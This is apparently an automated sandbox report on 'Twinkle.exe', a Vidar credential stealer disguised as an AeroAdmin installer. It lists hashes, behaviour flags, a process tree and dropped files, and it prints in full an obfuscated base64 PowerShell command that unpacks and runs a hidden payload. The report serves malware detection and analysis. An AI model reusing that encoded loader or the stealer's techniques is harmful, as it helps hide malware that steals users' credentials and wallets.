File name:

Twinkle.exe

Full analysis: https://app.any.run/tasks/3afc061a-0884-4d5a-938c-81e1446f8d74
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: June 04, 2025, 18:36:51
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
delphi
inno
installer
aeroadmin
rmm-tool
telegram
vidar
stealer
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 11 sections
MD5:

2E480D45B3A14A7D330A6659F4C78AF7

SHA1:

7D56024B074B9D6237B3C2271BC9347D5EA3AEC1

SHA256:

3529CE2A664CB63B3C59A50C55FF145BC2AED18DCD0760C3F8947D603FA07241

SSDEEP:

98304:2LVIF8P3n1BLHxtD59KEKjSvkNLB2Evzcl8c+ji/2OBn+5m3FgbbsjvXYmJj7cR6:fGpRAXwI480XPYbpBI36Kh

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executing a file with an untrusted certificate

      • Twinkle.exe (PID: 1512)
      • Twinkle.exe (PID: 5988)
      • AeroAdmin.exe (PID: 6456)

    • Actions looks like stealing of personal data

      • AppLaunch.exe (PID: 732)

    • Steals credentials from Web Browsers

      • AppLaunch.exe (PID: 732)

    • VIDAR mutex has been found

      • AppLaunch.exe (PID: 732)

    • VIDAR has been detected (YARA)

      • AppLaunch.exe (PID: 732)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • Twinkle.exe (PID: 5988)
      • Twinkle.exe (PID: 1512)
      • Twinkle.tmp (PID: 7488)
      • Twinkle.tmp (PID: 5236)
      • csc.exe (PID: 7576)
      • csc.exe (PID: 4220)
      • csc.exe (PID: 8160)
      • csc.exe (PID: 404)
      • csc.exe (PID: 8248)
      • csc.exe (PID: 8356)
      • csc.exe (PID: 8672)
      • csc.exe (PID: 8384)
      • csc.exe (PID: 8440)
      • csc.exe (PID: 8572)
      • csc.exe (PID: 8612)
      • csc.exe (PID: 8788)
      • csc.exe (PID: 8804)
      • csc.exe (PID: 7492)
      • csc.exe (PID: 8704)

    • Reads the Windows owner or organization settings

      • Twinkle.tmp (PID: 7488)
      • Twinkle.tmp (PID: 5236)

    • Reads security settings of Internet Explorer

      • Twinkle.tmp (PID: 7488)
      • AppLaunch.exe (PID: 732)

    • There is functionality for taking screenshot (YARA)

      • AeroAdmin.exe (PID: 6456)
      • AppLaunch.exe (PID: 732)

    • Process drops legitimate windows executable

      • Twinkle.tmp (PID: 5236)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • AppLaunch.exe (PID: 732)

    • Searches for installed software

      • AppLaunch.exe (PID: 732)

    • Base64-obfuscated command line is found

      • AppLaunch.exe (PID: 732)

    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 7296)
      • powershell.exe (PID: 3168)
      • powershell.exe (PID: 7336)
      • powershell.exe (PID: 6392)
      • powershell.exe (PID: 7684)
      • powershell.exe (PID: 7368)
      • powershell.exe (PID: 7352)
      • powershell.exe (PID: 7292)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 7576)
      • csc.exe (PID: 4220)
      • csc.exe (PID: 404)
      • csc.exe (PID: 8160)
      • csc.exe (PID: 8248)
      • csc.exe (PID: 8384)
      • csc.exe (PID: 8356)
      • csc.exe (PID: 8440)
      • csc.exe (PID: 8612)
      • csc.exe (PID: 8704)
      • csc.exe (PID: 8572)
      • csc.exe (PID: 8672)
      • csc.exe (PID: 8804)
      • csc.exe (PID: 7492)
      • csc.exe (PID: 8788)

    • The process bypasses the loading of PowerShell profile settings

      • AppLaunch.exe (PID: 732)

    • The process hide an interactive prompt from the user

      • AppLaunch.exe (PID: 732)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7296)
      • powershell.exe (PID: 3168)
      • powershell.exe (PID: 7336)
      • powershell.exe (PID: 6392)
      • powershell.exe (PID: 7368)
      • powershell.exe (PID: 7684)
      • powershell.exe (PID: 7352)
      • powershell.exe (PID: 5868)
      • powershell.exe (PID: 7292)
      • powershell.exe (PID: 8048)

    • Multiple wallet extension IDs have been found

      • AppLaunch.exe (PID: 732)

    • BASE64 encoded PowerShell command has been detected

      • AppLaunch.exe (PID: 732)

    • Starts POWERSHELL.EXE for commands execution

      • AppLaunch.exe (PID: 732)

  • INFO

    • Checks supported languages

      • Twinkle.tmp (PID: 7488)
      • Twinkle.exe (PID: 1512)
      • Twinkle.exe (PID: 5988)
      • AeroAdmin.exe (PID: 6456)
      • Twinkle.tmp (PID: 5236)
      • AppLaunch.exe (PID: 732)
      • csc.exe (PID: 7576)
      • cvtres.exe (PID: 7928)
      • csc.exe (PID: 8160)
      • cvtres.exe (PID: 7228)
      • csc.exe (PID: 4220)
      • cvtres.exe (PID: 6072)
      • cvtres.exe (PID: 6436)
      • csc.exe (PID: 404)
      • csc.exe (PID: 8248)
      • cvtres.exe (PID: 8320)
      • csc.exe (PID: 8384)
      • cvtres.exe (PID: 8468)
      • cvtres.exe (PID: 8428)

    • Create files in a temporary directory

      • Twinkle.tmp (PID: 7488)
      • Twinkle.exe (PID: 1512)
      • Twinkle.exe (PID: 5988)
      • Twinkle.tmp (PID: 5236)
      • powershell.exe (PID: 7296)
      • csc.exe (PID: 7576)
      • cvtres.exe (PID: 7928)
      • AppLaunch.exe (PID: 732)
      • powershell.exe (PID: 7684)
      • powershell.exe (PID: 7368)
      • powershell.exe (PID: 7352)
      • powershell.exe (PID: 7292)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 3168)
      • powershell.exe (PID: 5868)
      • powershell.exe (PID: 6392)
      • csc.exe (PID: 8160)
      • csc.exe (PID: 4220)
      • powershell.exe (PID: 5596)
      • csc.exe (PID: 404)
      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 5248)
      • cvtres.exe (PID: 7228)
      • cvtres.exe (PID: 8320)
      • csc.exe (PID: 8248)
      • cvtres.exe (PID: 8428)
      • csc.exe (PID: 8356)

    • Reads the computer name

      • Twinkle.tmp (PID: 7488)
      • Twinkle.tmp (PID: 5236)
      • AeroAdmin.exe (PID: 6456)
      • AppLaunch.exe (PID: 732)

    • Process checks computer location settings

      • Twinkle.tmp (PID: 7488)

    • Compiled with Borland Delphi (YARA)

      • Twinkle.tmp (PID: 5236)
      • Twinkle.exe (PID: 5988)

    • AEROADMIN has been detected

      • Twinkle.tmp (PID: 5236)

    • The sample compiled with english language support

      • Twinkle.tmp (PID: 5236)

    • Reads the machine GUID from the registry

      • AeroAdmin.exe (PID: 6456)
      • AppLaunch.exe (PID: 732)
      • csc.exe (PID: 7576)
      • csc.exe (PID: 4220)
      • csc.exe (PID: 8160)
      • csc.exe (PID: 404)
      • csc.exe (PID: 8248)
      • csc.exe (PID: 8384)

    • Detects InnoSetup installer (YARA)

      • Twinkle.exe (PID: 5988)
      • Twinkle.tmp (PID: 5236)

    • Creates files or folders in the user directory

      • Twinkle.tmp (PID: 5236)
      • AppLaunch.exe (PID: 732)

    • Reads product name

      • AppLaunch.exe (PID: 732)

    • Checks proxy server information

      • AppLaunch.exe (PID: 732)

    • Reads CPU info

      • AppLaunch.exe (PID: 732)

    • Reads the software policy settings

      • AppLaunch.exe (PID: 732)
      • powershell.exe (PID: 7296)
      • powershell.exe (PID: 7336)
      • powershell.exe (PID: 3168)
      • powershell.exe (PID: 6392)
      • powershell.exe (PID: 7684)
      • powershell.exe (PID: 7368)
      • powershell.exe (PID: 7352)
      • powershell.exe (PID: 7292)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 5868)
      • powershell.exe (PID: 7780)
      • powershell.exe (PID: 5596)
      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 5248)

    • Reads Environment values

      • AppLaunch.exe (PID: 732)

    • Creates files in the program directory

      • AppLaunch.exe (PID: 732)

    • Manual execution by a user

      • AppLaunch.exe (PID: 732)

    • Application launched itself

      • chrome.exe (PID: 7188)
      • chrome.exe (PID: 5344)
      • chrome.exe (PID: 5812)
      • chrome.exe (PID: 5308)
      • chrome.exe (PID: 7568)
      • chrome.exe (PID: 668)
      • chrome.exe (PID: 4784)
      • chrome.exe (PID: 7472)
      • chrome.exe (PID: 8172)
      • chrome.exe (PID: 8132)
      • chrome.exe (PID: 4608)
      • chrome.exe (PID: 8096)
      • chrome.exe (PID: 6040)
      • chrome.exe (PID: 3176)
      • chrome.exe (PID: 7688)

    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 7296)
      • powershell.exe (PID: 6392)
      • powershell.exe (PID: 7352)
      • powershell.exe (PID: 3168)
      • powershell.exe (PID: 7292)
      • powershell.exe (PID: 7368)
      • powershell.exe (PID: 8048)
      • powershell.exe (PID: 7336)
      • powershell.exe (PID: 5596)
      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 7684)
      • powershell.exe (PID: 5248)
      • powershell.exe (PID: 7780)
      • powershell.exe (PID: 5868)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3168)
      • powershell.exe (PID: 6392)
      • powershell.exe (PID: 7336)
      • powershell.exe (PID: 7684)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Inno Setup installer (34.1)
.exe | InstallShield setup (13.3)
.exe | Win32 EXE PECompact compressed (generic) (12.9)
.exe | Win32 Executable (generic) (1.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:03:13 06:55:45+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 2.25
CodeSize: 704512
InitializedDataSize: 162304
UninitializedDataSize: -
EntryPoint: 0xacfe0
OSVersion: 6.1
ImageVersion: -
SubsystemVersion: 6.1
Subsystem: Windows GUI
FileVersionNumber: 3.7.8.6
ProductVersionNumber: 3.7.8.6
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
Comments: This installation was built with Inno Setup.
CompanyName: AeroAdmin LLC
FileDescription: AeroAdmin
FileVersion: 3.7.8.6
LegalCopyright: AeroAdmin
OriginalFileName: AeroAdmin.exe
ProductName: AeroAdmin
ProductVersion: 3.7.8.6
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
248
Monitored processes
127
Malicious processes
5
Suspicious processes
11

Behavior graph

Click at the process to see the details
start twinkle.exe twinkle.tmp twinkle.exe twinkle.tmp aeroadmin.exe no specs #VIDAR applaunch.exe chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs slui.exe chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs csc.exe chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs csc.exe chrome.exe powershell.exe no specs cvtres.exe no specs conhost.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs cvtres.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs csc.exe csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs cvtres.exe no specs csc.exe csc.exe cvtres.exe no specs cvtres.exe no specs csc.exe csc.exe cvtres.exe no specs cvtres.exe no specs csc.exe csc.exe cvtres.exe no specs cvtres.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
404"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\lumqg3sq.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
496"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=122.0.6261.70 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x7ffc899edc40,0x7ffc899edc4c,0x7ffc899edc58C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
540\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
660C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES3125.tmp" "c:\Users\admin\AppData\Local\Temp\CSC9910A5CF725E48348BE5586C2289459B.TMP"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140_1_clr0400.dll
668"C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exeAppLaunch.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
21
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
732"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET ClickOnce Launch Utility
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\applaunch.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
1040\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1120"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --no-appcompat-clear --mojo-platform-channel-handle=2356 --field-trial-handle=2088,i,7045832297718548399,17298135265216829527,262144 --variations-seed-version /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1132C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
1300C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "JABhACAAPQAgADYAMAA0ADAAOwAkAGIAIAA9ACAAJwBDADoAXABVAHMAZQByAHMAXABhAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAHQAbQBwAEYARgAyADUALgB0AG0AcAAnADsAIAAmACgAIAAkAHMAaABFAGwAbABpAGQAWwAxAF0AKwAkAFMASABFAEwAbABJAEQAWwAxADMAXQArACcAeAAnACkAKAAgAG4ARQB3AC0AbwBCAGoARQBDAFQAIAAgAHMAeQBzAHQARQBtAC4ASQBvAC4AQwBvAG0AUABSAEUAUwBzAEkATwBuAC4ARABFAGYAbABhAFQAZQBzAFQAUgBFAGEATQAoAFsAaQBPAC4AbQBlAE0ATwBSAHkAcwB0AFIARQBhAE0AXQAgAFsAYwBPAG4AdgBFAHIAdABdADoAOgBmAHIAbwBNAEIAQQBTAEUANgA0AHMAdAByAGkAbgBHACgAJwBwAFYAVABSAGIAdABvAHcARgBIADIAdgB4AEQAOQA0AGkASQBkAEUATQBzAGkAagBhAEoAcQBLAEkAcABXAEcAZABxAHYAVQBhAGgAVgAwAFcAegBYAEUAZwAwAGwAdQBTAFQAVABIAGoAaAB5AG4ARABTAHYANwA5ADkAMABrAFoAbwBVAHUARwAwAFYANwBpAGUAKwBOADcAWABQAHUAOQBUAG4AMgBLAEEAeQA3AHQANgBzAFUAUwBQAFUAZAB3ADMAMABzAFkAeABNAHIAUwBVADcAYgByAGEATQA4AGkAKwBXAFMAVABGAGUAWgBnAFcAUgBJAHQAcgBQAGUASgBKAGMAbQBUAHEAQgAzAEsAUQAxAG8AbABVADUAQgBQADgAUQBCAFoATQBQAFcAVQBaAG8AdgBSAEIAeQBRAFEAUABBAHMASQAzAGQAUABKAEYAQQB5AE0AeQBTAFAAcABTAEUAagBqAHgAVwBNAHMAVAA0ADkASwA0AE0AQgBZADkAUwB2AC8ANwB5AG4ANAB5AHIAbwBNADMAcABlAEIAVwA4AFoASQBzADMARwBRAGwAdwBtAHEAZABMAEcAYQBYADgASABMAFUARQBjADkAOQB2AHUAUABEAFAAYwBJAEEARQBVAHkAQwB3AEoARgBuAEIAagBOAFAAbQBVAGcAcgB6AFIAQwBrAHYASQBuAEkAcQByAG8AQQB1AGwAQgBGAG4AUgBLAHYAdgBoAHYAaABhAHYAMgB1AFUATABsAGMARgBIAEwAawBNAEIAagBpAFUAbwBYAG8AMQBnAE4AMwB5AEoAdABjAG0ANQBHAEEAbQBoAGcAdgBQAGkATgB3AHkAMQB3AGEAYQB3AGUAdQBEADEAcwBEAGkAcwB6AEsAOAA2AE4AbQBDADcAdgBvAFoARQA2AFYAVQBEAHoAVwBKAGwAWQBEAFoALwBKAGwASwA1AFYAZQBOAEEATQB0AHMAUAAwAGgAawBJAFQARwBOAEgAbgAyADMAMAAzADEAdwBYAEkAcwArAGkAUwAvAFMATgB6AG8AUABTAGoAVAA0AFAASQB2AGcAWAA0AGEASABpACsAQgBxADQAZwBRAG0AZQBtAFkASABiAEMASgBQAHcANwB3AEwAWgBuAEcAKwBDAFIAVAAwAFIAYgBQAEwAUQBmAFgAYQA5AEoAYQB1AGEAbQBOAFIARwBUAEQAYwBLAGgATwA2AFQAMwBSAEYANQAyADMAWQBkAHIAYwAvAFcALwBuAHEAOABQAHEAZgAzAFgARwBSAEEAMAB4AEkAdgB2AG4AYwBpAHoANgB2AFgAOQA3ADcAaABGAFgATQAxAG0AQgB3AGIAcQBOAFkATQBMAFYARABpAHYAWABCAFoAUgBMAGUAMgAwAEsAbwBBAE4AKwB4AGQAZwBWAHkAYQBpAEwATABpAEcATwAvAGEAbQBoAFYAOQBIAEQAQQBiAE0ATQB1AFUANwBEAEkAOQBiAGQAcwAvAGMAbwBjADcAegBEACsAcgBwAHQAUwBRADQATAA0ADMAZgAzAGcAaQBvAGcAbAAxAHIAQwByAGIAeABBAE4AVwBlAFUARwA1AGUAOABEAHgAegBTAG4AaABIADQAYwBsAGUAbwBPADkAUwAvAHoAdwBaAFYAOABsADgAdQBOACsANQBCAEsAeQAyAFYAaQBOAFYAZQA4AEgAdABDAEkAWQByADgARgBOAHUAMABJAHcASgBOAGoATgB0ADgAKwA3AEYAcwBFAGMASQBrAEwAegBKAEgAYQBGAGMAMQBoAFoAKwA1AFIAMAByADcAaABjADUAbgB3AEoAeABKADkARwBYAEsAZQB0AG8AMAA3AG8AegBYAHcAbABIADAAQwBiACsAYwBuAEoAaABWAGIASgBHAGMALwBnADMAVwBCAHEATgBEADcAcwBqAHYATQBCAFQAQgBmAG4ARABhAEEAQQAzAFEAbAAvAEoASgAyAEYANgArAEsAMQB1AHMAUABWAEUAMgBkAFcAbgB2AGwAeABmADkANwBoAHQAQgBQAGkANwAxADgAPQAnACAAKQAsACAAWwBzAHkAUwBUAGUATQAuAEkAbwAuAEMATwBtAFAAcgBlAFMAcwBpAE8ATgAuAGMATwBtAHAAcgBlAFMAUwBpAE8AbgBNAG8AZABlAF0AOgA6AGQARQBDAG8AbQBwAHIAZQBTAFMAIAApAHwAIAAlACAAewAgAG4ARQB3AC0AbwBCAGoARQBDAFQAIAAgAEkATwAuAHMAdABSAGUAYQBtAHIAZQBhAGQARQBSACgAIAAkAF8ALABbAFMAWQBTAFQAZQBtAC4AVABlAHgAdAAuAGUAbgBjAG8ARABpAE4ARwBdADoAOgBBAHMAYwBpAEkAIAApAH0AIAB8ACAAJQAgAHsAJABfAC4AUgBlAGEARABUAE8AZQBOAGQAKAApACAAfQApAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAppLaunch.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
Total events
91 985
Read events
91 931
Write events
54
Delete events
0

Modification events

(PID) Process:(732) AppLaunch.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(732) AppLaunch.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(732) AppLaunch.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7188) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(7188) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(7188) chrome.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
Operation:writeName:usagestats
Value:
0
(PID) Process:(7188) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(7188) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\StabilityMetrics
Operation:writeName:user_experience_metrics.stability.exited_cleanly
Value:
0
(PID) Process:(5812) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(5812) chrome.exeKey:HKEY_CURRENT_USER\SOFTWARE\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
Executable files
49
Suspicious files
36
Text files
314
Unknown types
93

Dropped files

PID
Process
Filename
Type
5236Twinkle.tmpC:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\docs\.gitignoretext
MD5:2529E845806D223AFB1FF7DCDEAB55D4
SHA256:181314065DF2F2FDAF920B1A8B5311DAA216A2D6489A06ADA5B49CC514D89417
5988Twinkle.exeC:\Users\admin\AppData\Local\Temp\is-O932H.tmp\Twinkle.tmpexecutable
MD5:47BC7301474646DA031D126011237082
SHA256:82E4D5D34B2C9D3A522E67819CABE68610E7CC92F8525E3FDE9D02F2EB11C4F2
5236Twinkle.tmpC:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\is-D2H2B.tmpexecutable
MD5:ABE709E373ABA84C8D50C15D9F1B4816
SHA256:E1CF3B8C94E022746799BF2F20EF483F921AFDBC0BA0B821E9E8C1C9AE90A6CD
5236Twinkle.tmpC:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\VBoxRes.dllexecutable
MD5:FA8CC3EA706186037D74F024CC4E5EB1
SHA256:17C27CA7A122909675E3B5D48EEF7652583C9823BA2BDD2CDBC278DDEF2CB188
5236Twinkle.tmpC:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\is-REHTR.tmpexecutable
MD5:58B80D366D68B524E1B4FBB4C7DBC511
SHA256:E3893C35187B0DD848758979EBD0D766FC99F918EC9E685297F7D6CA080F122D
5236Twinkle.tmpC:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\libupnp_plugin.dllexecutable
MD5:E2970A14944FD74286BD6930F852178B
